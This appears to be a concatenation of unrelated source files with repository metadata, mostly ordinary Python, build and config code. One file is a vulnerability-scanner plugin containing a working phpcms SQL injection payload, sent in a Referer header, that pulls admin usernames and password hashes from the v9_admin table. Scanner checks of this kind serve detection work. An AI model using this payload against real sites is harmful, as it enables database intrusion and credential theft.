if func is None:
return partial(logged, level=level, name=name, message=message)
logname = name if name else func.__module__
log = logging.getLogger(logname)
logmsg = message if message else func.__name__
@wraps(func)
def wrapper(*args, **kwargs):
log.log(level, logmsg)
return func(*args, **kwargs)
return wrapper
@logged()
def add(x, y):
return x + y
@logged(level=logging.CRITICAL, name='example')
def spam():
print('Spam')
|
[
"szqh97@163.com"
] |
szqh97@163.com
|
1187a68a19b872d637c6b16caef681ea72ae907f
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/instances/msData/datatypes/Facets/unsignedByte/unsignedByte_totalDigits003.py
|
95d57599df105ea2f4f13dfa3f01a81276e9e890
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917
| 2023-07-29T17:10:13
| 2023-07-30T12:11:13
| 239,622,251
| 2
| 0
|
MIT
| 2023-07-25T14:19:04
| 2020-02-10T21:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 162
|
py
|
from output.models.ms_data.datatypes.facets.unsigned_byte.unsigned_byte_total_digits003_xsd.unsigned_byte_total_digits003 import Test
obj = Test(
foo=123
)
|
[
"tsoulloftas@gmail.com"
] |
tsoulloftas@gmail.com
|
64f97e236d713e1627d64ec3e03f6c532a3d2e76
|
0f0af12b45aa6f50fb418f9236fc622e56bbbfee
|
/server/podbaby/history/serializers.py
|
783c7dba88c4eec2024b18765cff0ede0b0e6e8b
|
[] |
no_license
|
danjac/podbaby2
|
234863e5d2ad39902bc64e63e285e7b507049727
|
17f02b0707120797cb3c3cccb95dacddff6375fa
|
refs/heads/master
| 2020-09-24T23:11:08.186829
| 2016-12-03T07:42:59
| 2016-12-03T07:42:59
| 66,766,438
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from rest_framework import serializers
from history.models import Play
class PlaySerializer(serializers.ModelSerializer):
class Meta:
model = Play
fields = (
'episode',
'created',
)
|
[
"danjac354@gmail.com"
] |
danjac354@gmail.com
|
fc019e03a0ec2faaedaaf366a1c30c010b4fbc68
|
97fcd33403e69e7e5bb60d27b7de73bb7c58b060
|
/awacs/applicationinsights.py
|
0d90c4b4f0fe2b10f6a8ea40d350fb33b7c02a67
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] |
permissive
|
isabella232/awacs
|
d2b132b527da6b6c2e89da26e9fdbc1d5ca7f191
|
41a131637c16a6912c17f92ac3bbf2a3bf978631
|
refs/heads/master
| 2023-01-09T07:45:22.199974
| 2020-11-16T05:11:01
| 2020-11-16T05:11:01
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,536
|
py
|
# Copyright (c) 2012-2013, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
from aws import Action as BaseAction
from aws import BaseARN
service_name = 'CloudWatch Application Insights'
prefix = 'applicationinsights'
class Action(BaseAction):
def __init__(self, action=None):
sup = super(Action, self)
sup.__init__(prefix, action)
class ARN(BaseARN):
def __init__(self, resource='', region='', account=''):
sup = super(ARN, self)
sup.__init__(service=prefix, resource=resource, region=region,
account=account)
CreateApplication = Action('CreateApplication')
CreateComponent = Action('CreateComponent')
DeleteApplication = Action('DeleteApplication')
DeleteComponent = Action('DeleteComponent')
DescribeApplication = Action('DescribeApplication')
DescribeComponent = Action('DescribeComponent')
DescribeComponentConfiguration = Action('DescribeComponentConfiguration')
DescribeComponentConfigurationRecommendation = \
Action('DescribeComponentConfigurationRecommendation')
DescribeObservation = Action('DescribeObservation')
DescribeProblem = Action('DescribeProblem')
DescribeProblemObservations = Action('DescribeProblemObservations')
ListApplications = Action('ListApplications')
ListComponents = Action('ListComponents')
ListProblems = Action('ListProblems')
UpdateApplication = Action('UpdateApplication')
UpdateComponent = Action('UpdateComponent')
UpdateComponentConfiguration = Action('UpdateComponentConfiguration')
|
[
"mark@peek.org"
] |
mark@peek.org
|
8df96bdca93c8ac21e2f1bbfaf44925c191e836e
|
e7e497b20442a4220296dea1550091a457df5a38
|
/main_project/release-gyp/user/user_cache.gyp
|
8ad0946152bb7f37f49b7e30cfb8de571639ce27
|
[] |
no_license
|
gunner14/old_rr_code
|
cf17a2dedf8dfcdcf441d49139adaadc770c0eea
|
bb047dc88fa7243ded61d840af0f8bad22d68dee
|
refs/heads/master
| 2021-01-17T18:23:28.154228
| 2013-12-02T23:45:33
| 2013-12-02T23:45:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,361
|
gyp
|
{
#包含公共设置
'includes':[
'user_common.gyp',
],
'variables':{
'service_name' : 'UserCache',
'service_src_path' : '<(main_project_path)/user/<(service_name)/',
},
'target_defaults' : {
'include_dirs' : [
'/usr/local/distcache-dev/include',
'/usr/local/distcache-util/include/',
'/usr/local/distcache/include/',
'<(main_project_path)/tripod-new/src/cpp/include',
'<(main_project_path)/TalkUtil/src',
'<(main_project_path)/third-party/include/',
'<(main_project_path)/third-party/apr/include/apr-1',
'<(main_project_path)/third-party/libactivemq/include/activemq-cpp-3.4.1',
'<(main_project_path)/third-party/redis-c-driver/',
'<(main_project_path)/message_pipe/src/cpp/',
],
'link_settings' : {
'libraries' : [
'-L../third-party/libactivemq/lib',
'-lactivemq-cpp',
#只用xce-dev或third-party的任一个都有问题,
'-L../third-party/apr/lib',
'-L/usr/local/xce-dev/lib64',
'-lapr-1', '-laprutil-1',
'-L/usr/local/distcache-util/lib',
'-lrdc-client',
],
'ldflags': [
'-Wl,-rpath /usr/local/xce-dev/lib64',
'-Wl,-rpath /usr/lib64',
],
},
},
'targets' : [
######################################################
{
'target_name' : 'DistUserCacheReloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/dist/reloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : '<(service_name)',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/src -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCacheAgent',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/agent -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCacheReloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/reloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCachePreloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/preloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : '<(service_name)Test',
'type' : 'executable',
'dependencies' : [
'../gtest.gyp:gtest',
'../gtest.gyp:gtest_main',
'./user_slice_and_adapter.gyp:*'
# '../3rdparty.gyp:hiredis',
# '../base.gyp:base',
# '../xce_base.gyp:xce_base',
#'../tripod2.gyp:tripod_core',
],
'sources' : [
],
},
] #end targets
}
|
[
"liyong19861014@gmail.com"
] |
liyong19861014@gmail.com
|
6d53bd2ad8620c52fba55ab8bda20744ee97b8a0
|
dbe1f4110921a08cb13e22ea325d503bd5627195
|
/chuhuo_2.7_clickhouse/bluedon/bdwafd/newscantools/plugins/Phpcms_post_clickSqlInjectionScript.py
|
1001b1ccc85c453fcecb86d7c9553f38992ae182
|
[] |
no_license
|
Hehouhua/waf_branches
|
92dc1b1cbecba20f24ef6c7372dde7caa43f9158
|
ca76f3a1ed8150b423474c9e37aee37841a5ee35
|
refs/heads/main
| 2023-01-07T11:33:31.667688
| 2020-11-03T06:58:33
| 2020-11-03T06:58:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,626
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from lib.common import *
def run_domain(http,ob):
list = []
try:
domain = ob['domain']
detail = u''
url = "%s://%s%s" % (ob['scheme'],ob['domain'],ob['base_path'])
expurl="%s%s"%(url,"index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2")
data=""
headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain","Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x4E56535F54455354,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#"}
#res, content = http.request(expurl,"POST",data,headers)
res, content = yx_httplib2_request(http,expurl,"POST",data,headers)
#print content
if content.find('NVS_TEST')>=0:
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"
request = postRequest(expurl,"POST",headers,)
response = getResponse(res)
list.append(getRecord(ob,ob['scheme']+"://"+ob['domain'],ob['level'],detail,request,response))
except Exception,e:
logging.getLogger().error("File:phpcms_post_click.py, run_domain function :" + str(e) + ",task id:" + ob['task_id'] + ",domain id:" + ob['domain_id'])
write_scan_log(ob['task_id'],ob['domain_id'],"File:phpcms_post_click.py, run_domain function :" + str(e))
#end try
return list
#end def
|
[
"hanson_wong@qq.com"
] |
hanson_wong@qq.com
|
cc7c313990a752b0eea8829bbf89e10a65814597
|
06671e14ae54f887be05a64c632712537d38add6
|
/integration_distributed_training/config_files/helios/13_repeat20x031/config_00166.py
|
e23ff123e7c6311a920a8756d990f5e9c1cc62bb
|
[] |
no_license
|
Jessilee/ImportanceSamplingSGD
|
cf74a220a55b468b72fed0538b3a6740f532fcb2
|
0831b9b1833726391a20594d2b2f64f80e1b8fe2
|
refs/heads/master
| 2021-01-24T10:12:48.285641
| 2016-02-05T19:25:34
| 2016-02-05T19:25:34
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,175
|
py
|
import numpy as np
import os
def get_model_config():
model_config = {}
#Importance sampling or vanilla sgd.
model_config["importance_algorithm"] = "isgd"
#model_config["importance_algorithm"] = "sgd"
#Momentum rate, where 0.0 corresponds to not using momentum
model_config["momentum_rate"] = 0.95
#The learning rate to use on the gradient averaged over a minibatch
model_config["learning_rate"] = 0.01
#config["dataset"] = "mnist"
model_config["dataset"] = "svhn"
#config["dataset"] = "kaldi-i84"
if model_config["dataset"] == "mnist":
print "Error. Missing values of (Ntrain, Nvalid, Ntest)"
quit()
model_config["num_input"] = 784
model_config["num_output"] = 10
elif model_config["dataset"] == "svhn":
(Ntrain, Nvalid, Ntest) = (574168, 30220, 26032)
model_config["num_input"] = 3072
model_config["num_output"] = 10
model_config["normalize_data"] = True
elif model_config["dataset"] == "kaldi-i84":
(Ntrain, Nvalid, Ntest) = (5436921, 389077, 253204)
model_config["num_input"] = 861
model_config["num_output"] = 3472
model_config["normalize_data"] = False
model_config['Ntrain'] = Ntrain
model_config['Nvalid'] = Nvalid
model_config['Ntest'] = Ntest
# Pick one, depending where you run this.
# This could be done differently too by looking at fuelrc
# or at the hostname.
#import socket
#data_root = { "serendib":"/home/dpln/data/data_lisa_data",
# "lambda":"/home/gyomalin/ML/data_lisa_data",
# "szkmbp":"/Users/gyomalin/Documents/fuel_data"}[socket.gethostname().lower()]
data_root = "/rap/jvb-000-aa/data/alaingui"
model_config["mnist_file"] = os.path.join(data_root, "mnist/mnist.pkl.gz")
model_config["svhn_file_train"] = os.path.join(data_root, "svhn/train_32x32.mat")
model_config["svhn_file_extra"] = os.path.join(data_root, "svhn/extra_32x32.mat")
model_config["svhn_file_test"] = os.path.join(data_root, "svhn/test_32x32.mat")
model_config["kaldi-i84_file_train"] = os.path.join(data_root, "kaldi/i84_train.gz")
model_config["kaldi-i84_file_valid"] = os.path.join(data_root, "kaldi/i84_valid.gz")
model_config["kaldi-i84_file_test"] = os.path.join(data_root, "kaldi/i84_test.gz")
model_config["load_svhn_normalization_from_file"] = True
model_config["save_svhn_normalization_to_file"] = False
model_config["svhn_normalization_value_file"] = os.path.join(data_root, "svhn/svhn_normalization_values.pkl")
model_config["hidden_sizes"] = [2048, 2048, 2048, 2048]
# Note from Guillaume : I'm not fond at all of using seeds,
# but here it is used ONLY for the initial partitioning into train/valid.
model_config["seed"] = 9999494
#Weights are initialized to N(0,1) * initial_weight_size
model_config["initial_weight_size"] = 0.01
#Hold this fraction of the instances in the validation dataset
model_config["fraction_validation"] = 0.05
model_config["master_routine"] = ["sync_params"] + ["refresh_importance_weights"] + (["process_minibatch"] * 32)
model_config["worker_routine"] = ["sync_params"] + (["process_minibatch"] * 10)
model_config["turn_off_importance_sampling"] = False
assert model_config['Ntrain'] is not None and 0 < model_config['Ntrain']
assert model_config['Nvalid'] is not None
assert model_config['Ntest'] is not None
return model_config
def get_database_config():
# Try to connect to the database for at least 10 minutes before giving up.
# When setting this to below 1 minute on Helios, the workers would give up
# way to easily. This value also controls how much time the workers will
# be willing to wait for the parameters to be present on the server.
connection_setup_timeout = 10*60
# Pick one, depending where you run this.
# This could be done differently too by looking at fuelrc
# or at the hostname.
#import socket
#experiment_root_dir = { "serendib":"/home/dpln/tmp",
# "lambda":"/home/gyomalin/ML/tmp",
# "szkmbp":"/Users/gyomalin/tmp"}[socket.gethostname().lower()]
experiment_root_dir = "/rap/jvb-000-aa/data/alaingui/experiments_ISGD/00166"
redis_rdb_path_plus_filename = os.path.join(experiment_root_dir, "00166.rdb")
logging_folder = experiment_root_dir
want_rdb_background_save = True
# This is part of a discussion about when we should the master
# start its training with uniform sampling SGD and when it should
# perform importance sampling SGD.
# The default value is set to np.Nan, and right now the criterion
# to decide if a weight is usable is to check if it's not np.Nan.
#
# We can decide to add other options later to include the staleness
# of the importance weights, or other simular criterion, to define
# what constitutes a "usable" value.
default_importance_weight = np.NaN
#default_importance_weight = 1.0
want_master_to_do_USGD_when_ISGD_is_not_possible = True
master_usable_importance_weights_threshold_to_ISGD = 0.1 # cannot be None
# The master will only consider importance weights which were updated this number of seconds ago.
staleness_threshold_seconds = 20
staleness_threshold_num_minibatches_master_processed = None
# Guillaume is not so fond of this approach.
importance_weight_additive_constant = 10.0
serialized_parameters_format ="opaque_string"
# These two values don't have to be the same.
# It might be possible that the master runs on a GPU
# and the workers run on CPUs just to try stuff out.
workers_minibatch_size = 2048
master_minibatch_size = 128
# This is not really being used anywhere.
# We should consider deleting it after making sure that it
# indeed is not being used, but then we could argue that it
# would be a good idea to use that name to automatically determine
# the values of (Ntrain, Nvalid, Ntest).
dataset_name='svhn'
L_measurements=["individual_importance_weight", "individual_gradient_square_norm", "individual_loss", "individual_accuracy", "minibatch_gradient_mean_square_norm"]
L_segments = ["train", "valid", "test"]
#
# The rest of this code is just checks and quantities generated automatically.
#
assert workers_minibatch_size is not None and 0 < workers_minibatch_size
assert master_minibatch_size is not None and 0 < master_minibatch_size
assert dataset_name is not None
assert serialized_parameters_format in ["opaque_string", "ndarray_float32_tostring"]
assert 0.0 <= master_usable_importance_weights_threshold_to_ISGD
assert master_usable_importance_weights_threshold_to_ISGD <= 1.0
return dict(connection_setup_timeout=connection_setup_timeout,
workers_minibatch_size=workers_minibatch_size,
master_minibatch_size=master_minibatch_size,
dataset_name=dataset_name,
L_measurements=L_measurements,
L_segments=L_segments,
want_only_indices_for_master=True,
want_exclude_partial_minibatch=True,
serialized_parameters_format=serialized_parameters_format,
default_importance_weight=default_importance_weight,
want_master_to_do_USGD_when_ISGD_is_not_possible=want_master_to_do_USGD_when_ISGD_is_not_possible,
master_usable_importance_weights_threshold_to_ISGD=master_usable_importance_weights_threshold_to_ISGD,
staleness_threshold_seconds=staleness_threshold_seconds,
staleness_threshold_num_minibatches_master_processed=staleness_threshold_num_minibatches_master_processed,
importance_weight_additive_constant=importance_weight_additive_constant,
logging_folder=logging_folder,
redis_rdb_path_plus_filename=redis_rdb_path_plus_filename,
want_rdb_background_save=want_rdb_background_save)
def get_helios_config():
# Optional.
return {}
|
[
"gyomalin@gmail.com"
] |
gyomalin@gmail.com
|
8c9cac2973d6978608f4768621bb61a098589c65
|
8316b326d035266d41875a72defdf7e958717d0a
|
/Regression/Poly_linear_regression_boston_house_predict.py
|
465a1cccc33d4b05fe7f9a57daa1fb6da7a7de61
|
[] |
no_license
|
MrFiona/MachineLearning
|
617387592b51f38e59de64c090f943ecee48bf1a
|
7cb49b8d86abfda3bd8b4b187ce03faa69e6302d
|
refs/heads/master
| 2021-05-06T17:18:49.864855
| 2018-01-24T15:29:36
| 2018-01-24T15:29:36
| 111,804,323
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,783
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time : 2017-11-28 15:22
# Author : MrFiona
# File : Poly_linear_regression_boston_house_predict.py
# Software: PyCharm Community Edition
import warnings
import numpy as np
import pandas as pd
import matplotlib as mpl
import matplotlib.pyplot as plt
from sklearn import datasets
from sklearn.model_selection import train_test_split, GridSearchCV
from sklearn.linear_model import LinearRegression, LassoCV, RidgeCV, ElasticNetCV
from sklearn.linear_model.coordinate_descent import ConvergenceWarning
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import PolynomialFeatures, StandardScaler
names = ['CRIM','ZN', 'INDUS','CHAS','NOX','RM','AGE','DIS','RAD','TAX','PTRATIO','B','LSTAT']
def notEmpty(s):
return s != ''
mpl.rcParams[u'font.sans-serif'] = [u'simHei']
mpl.rcParams[u'axes.unicode_minus'] = False
warnings.filterwarnings(action = 'ignore', category=ConvergenceWarning)
np.set_printoptions(linewidth=100, suppress=True)
df = pd.read_csv('../datas/boston_housing.data', header=None)
# print(df.values)
data = np.empty((len(df), 14))
for i, d in enumerate(df.values):
d = list(map(float,list(filter(notEmpty, d[0].split(' ')))))
data[i] = d
x, y = np.split(data, (13,), axis=1)
y = y.ravel()
# print('x:\t', x, type(x))
# print('y:\t', y, type(y))
print ("样本数据量:%d, 特征个数:%d" % x.shape)
print ("target样本数据量:%d" % y.shape[0])
models = [
Pipeline([
('ss', StandardScaler()),
('poly', PolynomialFeatures()),
('linear', RidgeCV(alphas=np.logspace(-3, 1, 20)))
]),
Pipeline([
('ss', StandardScaler()),
('poly', PolynomialFeatures()),
('linear', LassoCV(alphas=np.logspace(-3, 1, 20)))
])
]
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)
parameters = {
"poly__degree": [3,2,1],
"poly__interaction_only": [True, False],
"poly__include_bias": [True, False],
"linear__fit_intercept": [True, False]
}
titles = ['Ridge', 'Lasso']
colors = ['g-', 'b-']
plt.figure(figsize=(16, 8), facecolor='w')
ln_x_test = range(len(x_test))
plt.plot(ln_x_test, y_test, 'r-', lw=2, label=u'真实值')
for t in range(2):
model = GridSearchCV(models[t], param_grid=parameters, n_jobs=1)
model.fit(x_train, y_train)
print("%s算法:最优参数:" % titles[t], model.best_params_)
print("%s算法:R值=%.3f" % (titles[t], model.best_score_))
y_predict = model.predict(x_test)
plt.plot(ln_x_test, y_predict, colors[t], lw=t + 3, label=u'%s算法估计值,$R^2$=%.3f' % (titles[t], model.best_score_))
plt.legend(loc='upper left')
plt.grid(True)
plt.title(u"波士顿房屋价格预测")
plt.show()
|
[
"1160177283@qq.com"
] |
1160177283@qq.com
|
79ae6089ad6be6b58d2ffa5c5819cdeffca5037a
|
5d6a464bcf381a44588d6a0a475f666bdc8b5f05
|
/unittests/namespace_matcher_tester.py
|
a517fd7da3b64b22821666f82bf8e3b8183eb0f0
|
[
"BSL-1.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
iMichka/pygccxml
|
d4f2ac032a742f1cd9c73876f6ba6a85d2047837
|
f872d056f477ed2438cd22b422d60dc924469805
|
refs/heads/develop
| 2023-08-05T04:35:32.774634
| 2017-01-10T06:04:17
| 2017-01-10T06:04:17
| 45,710,813
| 0
| 2
|
BSL-1.0
| 2023-08-20T21:02:24
| 2015-11-06T22:14:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,084
|
py
|
# Copyright 2014-2017 Insight Software Consortium.
# Copyright 2004-2009 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0.
# See http://www.boost.org/LICENSE_1_0.txt
import unittest
import parser_test_case
from pygccxml import parser
from pygccxml import declarations
class Test(parser_test_case.parser_test_case_t):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args):
parser_test_case.parser_test_case_t.__init__(self, *args)
self.header = 'bit_fields.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse([self.header], self.config)
def test(self):
criteria = declarations.namespace_matcher_t(name='bit_fields')
declarations.matcher.get_single(criteria, self.declarations)
self.assertTrue(
str(criteria) == '(decl type==namespace_t) and (name==bit_fields)')
def test_allow_empty(self):
global_ns = declarations.get_global_namespace(self.declarations)
global_ns.init_optimizer()
self.assertTrue(
0 == len(global_ns.namespaces('does not exist', allow_empty=True)))
class unnamed_ns_tester_t(parser_test_case.parser_test_case_t):
COMPILATION_MODE = parser.COMPILATION_MODE.ALL_AT_ONCE
def __init__(self, *args):
parser_test_case.parser_test_case_t.__init__(self, *args)
self.header = 'unnamed_ns_bug.hpp'
self.declarations = None
def setUp(self):
if not self.declarations:
self.declarations = parser.parse([self.header], self.config)
def test(self):
declarations.matcher.get_single(
declarations.namespace_matcher_t(name='::'), self.declarations)
def create_suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(Test))
suite.addTest(unittest.makeSuite(unnamed_ns_tester_t))
return suite
def run_suite():
unittest.TextTestRunner(verbosity=2).run(create_suite())
if __name__ == "__main__":
run_suite()
|
[
"michkapopoff@gmail.com"
] |
michkapopoff@gmail.com
|
b865747d25a963ea30d051c763b151966b68b592
|
667f153e47aec4ea345ea87591bc4f5d305b10bf
|
/Solutions/Ch1Ex032.py
|
146193ba642a281f4a5d647a77ffee5e055d6028
|
[] |
no_license
|
Parshwa-P3/ThePythonWorkbook-Solutions
|
feb498783d05d0b4e5cbc6cd5961dd1e611f5f52
|
5694cb52e9e9eac2ab14b1a3dcb462cff8501393
|
refs/heads/master
| 2022-11-15T20:18:53.427665
| 2020-06-28T21:50:48
| 2020-06-28T21:50:48
| 275,670,813
| 1
| 0
| null | 2020-06-28T21:50:49
| 2020-06-28T21:26:01
|
Python
|
UTF-8
|
Python
| false
| false
| 489
|
py
|
# Ch1Ex032.py
# Author: Parshwa Patil
# ThePythonWorkbook Solutions
# Exercise No. 32
# Title: Sort three numbers
def main():
print("Enter numbers: ")
numbers = list(map(int, input().strip().split()))
for i in range(len(numbers) - 1):
for j in range(1, len(numbers)):
if numbers[j - 1] > numbers[j]:
numbers[j - 1], numbers[j] = numbers[j], numbers[j - 1]
print("Sorted: ")
for n in numbers: print(str(n) + " ", end="")
if __name__ == "__main__": main()
|
[
"noreply@github.com"
] |
Parshwa-P3.noreply@github.com
|
11774cab8ab8b849d8287ce7a299505e8750722b
|
555377aa073d24896d43d6d20d8f9f588d6c36b8
|
/paleomix/common/bamfiles.py
|
4b3c6c6f539923c279d04dea982a2307263c0bee
|
[
"MIT"
] |
permissive
|
jfy133/paleomix
|
0688916c21051bb02b263e983d9b9efbe5af5215
|
f7f687f6f69b2faedd247a1d289d28657710a8c2
|
refs/heads/master
| 2022-11-10T18:37:02.178614
| 2020-06-14T12:24:09
| 2020-06-14T12:24:09
| 270,936,768
| 0
| 0
|
MIT
| 2020-06-09T07:46:19
| 2020-06-09T07:46:18
| null |
UTF-8
|
Python
| false
| false
| 4,837
|
py
|
#!/usr/bin/python
#
# Copyright (c) 2012 Mikkel Schubert <MikkelSch@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import itertools
# BAM flags as defined in the BAM specification
BAM_SUPPLEMENTARY_ALIGNMENT = 0x800
BAM_PCR_DUPLICATE = 0x400
BAM_QUALITY_CONTROL_FAILED = 0x200
BAM_SECONDARY_ALIGNMENT = 0x100
BAM_IS_LAST_SEGMENT = 0x80
BAM_IS_FIRST_SEGMENT = 0x40
BAM_NEXT_IS_REVERSED = 0x20
BAM_READ_IS_REVERSED = 0x10
BAM_NEXT_IS_UNMAPPED = 0x8
BAM_READ_IS_UNMAPPED = 0x4
BAM_PROPER_SEGMENTS = 0x2
BAM_SEGMENTED = 0x1
# Default filters when processing reads
EXCLUDED_FLAGS = (
BAM_SUPPLEMENTARY_ALIGNMENT
| BAM_PCR_DUPLICATE
| BAM_QUALITY_CONTROL_FAILED
| BAM_SECONDARY_ALIGNMENT
| BAM_READ_IS_UNMAPPED
)
class BAMRegionsIter:
"""Iterates over a BAM file, yield a separate iterator for each contig
in the BAM or region in the list of regions if these are species, which in
turn iterates over individual positions. This allows for the following
pattern when parsing BAM files:
for region in BAMRegionsIter(handle):
# Setup per region
for (position, records) in region:
# Setup per position
...
# Teardown per position
# Teardown per region
The list of regions given to the iterator is expected to be in BED-like
records (see e.g. paleomix.common.bedtools), with these properties:
- contig: Name of the contig in the BED file
- start: 0-based offset for the start of the region
- end: 1-based offset (i.e. past-the-end) of the region
- name: The name of the region
"""
def __init__(self, handle, regions=None, exclude_flags=EXCLUDED_FLAGS):
"""
- handle: BAM file handle (c.f. module 'pysam')
- regions: List of BED-like regions (see above)
"""
self._handle = handle
self._regions = regions
self._excluded = exclude_flags
def __iter__(self):
if self._regions:
for region in self._regions:
records = self._handle.fetch(region.contig, region.start, region.end)
records = self._filter(records)
tid = self._handle.gettid(region.contig)
yield _BAMRegion(tid, records, region.name, region.start, region.end)
else:
def _by_tid(record):
"""Group by reference ID."""
return record.tid
# Save a copy, as these are properties generated upon every access!
names = self._handle.references
lengths = self._handle.lengths
records = self._filter(self._handle)
records = itertools.groupby(records, key=_by_tid)
for (tid, items) in records:
if tid >= 0:
name = names[tid]
length = lengths[tid]
else:
name = length = None
yield _BAMRegion(tid, items, name, 0, length)
def _filter(self, records):
"""Filters records by flags, if 'exclude_flags' is set."""
if self._excluded:
pred = lambda record: not record.flag & self._excluded
return filter(pred, records)
return records
class _BAMRegion:
"""Implements iteration over sites in a BAM file. It is assumed that the
BAM file is sorted, and that the input records are from one contig.
"""
def __init__(self, tid, records, name, start, end):
self._records = records
self.tid = tid
self.name = name
self.start = start
self.end = end
def __iter__(self):
def _by_pos(record):
"""Group by position."""
return record.pos
for group in itertools.groupby(self._records, _by_pos):
yield group
|
[
"MikkelSch@gmail.com"
] |
MikkelSch@gmail.com
|
92ffd6bc7322742b3d8da89f9f43fec5692453de
|
4554fcb85e4c8c33a5b5e68ab9f16c580afcab41
|
/projecteuler/test_xiaobai_17.py
|
d9b6678e2bc92bba87fc83a8f6d9bb16ee3c82a9
|
[] |
no_license
|
xshen1122/Follow_Huang_Python
|
12f4cebd8ddbc241a1c32cfa16288f059b530557
|
fcea6d1361aa768fb286e1ef4a22d5c4d0026667
|
refs/heads/master
| 2021-01-01T04:37:31.081142
| 2017-12-05T07:31:34
| 2017-12-05T07:31:34
| 97,211,313
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,630
|
py
|
# test_xiaobai_17.py
# coding: utf-8
'''
If the numbers 1 to 5 are written out in words: one, two, three, four, five, then there are 3 + 3 + 5 + 4 + 4 = 19 letters used in total.
If all the numbers from 1 to 1000 (one thousand) inclusive were written out in words, how many letters would be used?
'''
def getLetter(yourlist):
ss=''
for item in yourlist:
ss += item
return len(ss)
def getList(yourlist):
for item in one_digit[:-1]:
yourlist.append(yourlist[0]+item)
return yourlist
if __name__ == '__main__':
one_digit = ['one','two','three','four','five','six','seven','eight','nine','ten']
teenage_digit = ['eleven','twelve','thirteen','fourteen','fifteen','sixteen','seventeen','eighteen','nineteen']
twenty_digit = ['twenty']
thirty_digit = ['thirty']
forty_digit = ['forty']
fifty_digit = ['fifty']
sixty_digit = ['sixty']
seventy_digit = ['seventy']
eighty_digit = ['eighty']
ninety_digit = ['ninety']
hundred_digit = ['hundredand']
letter_list = []
letter_list.append(getLetter(one_digit))
letter_list.append(getLetter(getList(twenty_digit)))
letter_list.append(getLetter(getList(thirty_digit)))
letter_list.append(getLetter(getList(forty_digit)))
letter_list.append(getLetter(getList(fifty_digit)))
letter_list.append(getLetter(getList(sixty_digit)))
letter_list.append(getLetter(getList(seventy_digit)))
letter_list.append(getLetter(getList(eighty_digit)))
letter_list.append(getLetter(getList(ninety_digit)))
result = 0
for item in letter_list:
result += item
print result # 1-99 has 787 letters
# 100 - 199 has ??
#以下就按100-199,200-299, 900-999,1000来计数即可
|
[
"xueqin.shen@outlook.com"
] |
xueqin.shen@outlook.com
|
